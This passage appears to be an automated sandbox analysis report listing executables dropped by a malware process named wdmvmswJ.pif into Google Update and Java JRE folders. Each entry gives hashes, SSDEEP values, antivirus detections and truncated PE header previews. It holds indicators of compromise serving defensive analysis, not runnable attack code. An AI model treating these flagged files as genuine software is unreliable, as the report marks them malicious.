                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:v1FDmRF+wpx/Qaf8sqjnhMgeiCl7G0nehbGZpbD:rmRF+wn/JfoDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:AB12413F8ADF81CD61F47B65C8191D91
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:395965426D175EAAAD5F288244B92CEF517F13F0
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:778940328D784AA7EF5419F0341D8884E06547B8B3A226385A69F652343DB45F
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:F86753BE890A7B39AA0679693E89487BF6B6DC23F300A89268CE5A6D714B641FB34995F4DF485E47B2465D03B6FBF24022A80DBB10C20CF01D0CEA3AB829EF2A
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|6..8W..8W..8W...%..6W...%...W...=...W...=...W...=..{W...%.. W...%..#W..8W...V..L<...W..L<s.9W..L<..9W..Rich8W..................PE..L...Y..d.....................r....................@..................................O...............................................0...2..............................T...........................h...@............................................text...e........................... ..`.rdata..b...........................@..@.data....'..........................@....rsrc....2...0...4..................@..@.reloc...p...p...`..................@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1228288
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.161999738741843
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:Q2Ae621B+0YRXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDtL:9E21BPKsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:146E89CAAC008C1564C79A968E253A2B
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:50D396F80D6758887BD6362424475DC18DF85621
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:75DDE01518EBE41997BD828A34D0A542212C69783C9C6A94F44BAC4C36410A40
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:DC37F8FB0881D85A25FCCF0354974536C81118AFFE8736D8B69BF18CD0DFB4C51A1CB26F3F0C5C7AAA35529F1B6CD917F1B17206ECD9B68F563C95BD28EC73BB
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............Z...Z...Z..[..Z..[L..Z..[..Zu.[.Zu.[..Zu.[..Z..[..Z...Z...Z..[...Z..]Z...Z..5Z...Z..[...ZRich...Z........................PE..L...;..d..........................................@..........................................................................5..<....`..p2...........................+..T...........................h+..@............................................text...h........................... ..`.rdata...\.......^..................@..@.data........@.......0..............@....rsrc...p2...`...4...:..............@..@.reloc...`.......P...n..............@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):105669632
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.999989848925704
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3145728:ILAKHgDx/oat8qdTsdZDAE1mXXaYS79zDIICU:yBWx/pt8U7E6aZRfIICU
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:19B25C0B01E36B20F775D2E51DF8D6E0
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:EE34F811EDB834A7B52DB46AE3854339D9B3EF74
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:CF3EF17B92A66D23714746394E7B8DB35A736293D35402F8DA45B898364E1BDF
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:5FC567AA0BADD939D22F4B409E949E60046623073407D1224B1486C762F9CA11526119008BE5B2303147A2C71A73FEECFA8337206127FBA32A6793561FE1B326
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......4...LC................@..............................L.....L.L... ..................................................X..P........+C.....|....................W..............................PP..@............Z...............................text...&2.......4.................. ..`.rdata.......P.......8..............@..@.data...p....p.......N..............@....pdata..|............P..............@..@.00cfg..0............T..............@..@.retplne.............V...................rsrc....+C......,C..X..............@..@.reloc........C.......C.............@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1158144
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.0680903264293455
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:FWXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:FWsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:F66209B3EEC662B0B39D950BE74B6B5D
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:224C63DF0CD0A43355D3E8FCB095BFABF0FD3B0D
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:6CB4FE6E3100664143CB3B87A097054AAB859DF46DB7D92D60D0B9BEF26A148A
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:BB4DB8CF15A1B4E4112C32455483D4013BB22171CB6DFE0D977390A0B0522271DE00A0D6B91ECFEEE8CA8AE4E2440A087BEF1DFCE0B675D5C86CD946DCFB7260
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8.C.VWC.VWC.VWJ..WS.VW!.WVA.VW!.SV\.VW!.RVO.VW!.UVB.VWW.WVJ.VWC.WW!.VW.SVB.VW..WB.VW.TVB.VWRichC.VW........PE..L.....d.................8...6.......4.......P....@................................./[......................................$i.......................................b..T............................a..@............P...............................text....7.......8.................. ..`.rdata...#...P...$...<..............@..@.data...L............`..............@....rsrc................b..............@..@.reloc...P.......@...l..............@...........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.032428608819242
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:JKVXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:8VsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:9312EB6204E504A57750175EC71EA0C7
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:490274733D5378FFFC1FA8A7EA82957AA9A10B35
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:68D6A9D77A7030FEB2E343938677B0760F5E92E7E4AD7B80D768BA5885BAA072
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:F841660DCD40552E0D99B3C14FDA1E4A565D5F6B6C6E1897774A68B866F3A75F6CE99580A41373CFC08F8DAA98356A4762DFFDD15C27AD49C221BD0D39F106CD
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................2A.......................................&.......@..d...........................h"..T............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0....... ..............@....rsrc...d....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Java\jre-1.8\bin\java.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1375232
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.446085543295778
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:/nEbH0j4x7R6SvyCMkXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/nT:/kwOtO7ksqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:9A7105EED62B1DAE0D1D1D6D2C0DFB90
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:A10B751F7902C35360E8A59329D2A93EBE880C7D
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:118FD11580BBF77B1D746F4EF62542382FD2F8019237855D0F35FBDA4944498D
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:667BFDA89195528503EBEF5AC4057ACCEB70C55F649DA3F5E0BDF49FC79568FF0FA9C1405C688ABFB20A7E1B49165A0E3FA9F002091D7217D1D82F9F84F87FCF
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..F<...<...<...(..3...(......(......^.F.;...^......^......^..)...(..5...<...N......3.....D.=......=...Rich<...........................PE..L.....d.................N...t....../........`....@..........................@......K........................................!..d....P..............................P...T...............................@............`...............................text...\M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc........P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1212416
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.119746757907992
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:Mv1vvpXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:81JsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:A7EACF077D0A0350506BD1E2109E515D
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:C4140A546D4391CDCB271CBFA8D401D46236CB1E
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:A286615DD163790583D9BBFC2EAFF99D363932F444AB2F220A2B6626DDCA346D
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:464CC5BC58682D294EB923DA5334AEBA4B6E7DE4F8B7495F422D9B707BB54CAE9A963992BC04E2AD94CB4B4C8ABD80674B73D66BB0A046DA8E517387D4852F19
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......VT.f.5.5.5.5.5.5.M\5.5.5pM.4.5.5pM.4.5.5pM.4.5.5.^.4.5.5.5.5.5.5pM.455.5.L.4.5.5.L05.5.5.L.4.5.5Rich.5.5........................PE..L.....d.................P...........K.......`....@.........................................................................8...@......................................T...............................@............`...............................text....O.......P.................. ..`.rdata...g...`...h...T..............@..@.data...@...........................@....rsrc...............................@..@.reloc...P...p...@...@..............@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1375232
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.446834943908701
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:DnU/h/4KXsqjnhMgeiCl7G0nehbGZpbD:DU/VrDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:D78A5AAEA58E0159B47FC19C691D1334
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:32B9BBADB5D54C839A6A68A4ACCB156B129160AC
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:10D7609BCDFF7605FD29D91395B6519B2BE1525367FCB38DD22512B0483E1767
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:D347A08A97C23F95537C5F6166026F4C5DC73FAE02FF80722ED42E30649E4583EBF36180DF24A9C5120827A4DE9A499094E6E84028278069A83846D8E00D1388
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..#}..p}..p}..pi.qr..pi.q..pi.qo..p..}pz..p..qX..p..qo..p..qh..pi.qt..p}..p...p..qr..p...p|..p..q|..pRich}..p........................PE..L.....d.................N...t......7........`....@..........................@...............................................!..d....P.............................P...T...............................@............`...............................text....M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc.......P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1513984
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.483761953888129
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:xx71iBLZ05jNTmJWExQsqjnhMgeiCl7G0nehbGZpbD:xxhiHIjNgMDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:F1726C44CE3C97EC96140B27591F12CD
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:429243996126A2102F30F4D5EAD16F6A07D3AABF
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:42F53E47C40B949D2BDBEF5088AE35600B96B1AC7109B9D63F1655FF72EC0008
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:51187252EA750EF08F257D3ACAAF61EDB2F3C0D4FD3A26610B38A5C48EC952746F0709F99933E054B2B3D9F66D50E74659458CB0A9ADD236DC7FA54047884C9C
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4rv.4rv.4rv. .u.>rv. .s..rv. .r.&rv.V.r.!rv.V.u.,rv.V.s..rv. .w.?rv.4rw..rv..r.&rv..s.0rv....5rv..t.5rv.Rich4rv.................PE..L.....d............................^.............@..................................N..........................................x...................................L...T............................4..@...................,........................text...,........................... ..`.rdata..:(.......*..................@..@.data............t..................@....rsrc................:..............@..@.reloc...p...0...`..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.032903438073016
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:j3rFXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:7JsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:BE5EC3FF2312C43AA909295E274A9D1A
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:216F8659A55F93E1A6AD6B40A7D842D37AB0E134
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:AB97F6566992F1EC85D2E3D24113B6A4F6A7AAA22FF82D1BB60140B4FB72DD62
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:9ED486A0F34B0B4A0774CFBC29A9CCC8FE51C7129BF23B3119270DC9EEF85B40021B4E650344ABB7C3E77042DFBD8C4A21EBB0946F857C05F90DBACC73362164
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................7a.......................................&.......@..H............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...H....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1242112
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.172693215659001
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:qYdP/yXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:bdP/ysqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:226E673A0ED0BEC11EB93C20A421BBD4
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:B6F84C13C6C9B41491D1EB5D6DE5C58E033FACED
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:174721A88C3EDD74FF3061B5AA64D19BF5C681D94F2288E5321359428DAA05C9
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:A42D60670B0E10B833F252E5322E10F5EF265B3E53D3536BAE31010099FB4C02E9EC54789BCB7E1541749FFBA428BC6A527E4E2E45E73AA5DD7DCDAB5D2FCCB7
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.$x..wx..wx..wq.uwn..wl..vp..w...v}..w...vu..w...v{..wx..w...w...v_..w...vy..w...vs..w...wy..w...vy..wRichx..w........PE..L...}.d..........................................@..........................P......l...........................................h...................................`v..T............................u..@............................................text............................... ..`.rdata..R...........................@..@.data...P2..........................@....rsrc...............................@..@.reloc...`.......P..................@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.032923839432674
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:Fy5dXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:g3sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:EFF29C547B82476ACDE5212C394C4AE5
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:F4D6F651AD4329162E5597BA8B426AAF13A76BDC
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:2BEF18D3B2B3BB8E093EDCAB83563BA5DCD8C7ED604E996286672693915D5F4A
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:9F428101612F94ECE64F819EEDB41688B00C849924DDF50189C6B87BD64195987D7EE34FD688CC0F8189A0B683C1C7F8A5D60DD0B3528A3B6276FC7E3A052DCE
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..................................e.......................................&.......@..\............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...\....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.032997212689758
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:wKlVXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:l7sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:63DB5326B4AE3FC288F3D33D08CDE017
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:04135A0E4E614659F03D17707BBCDB5ABA242373
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:C58B362049CD2FDC515A1630D4DB67DC08C764D59A653F858DDC87BC2511C691
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:C2DEC3D9FC74002742A236FDF4B4449250E9352371C9291CBBB9900B5D5A78F6CDD706A47339663ABE09C2CAA00F1A6E7725680B3212958BC9EBBD5BBE01212E
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................]........................................&.......@..T............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...T....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
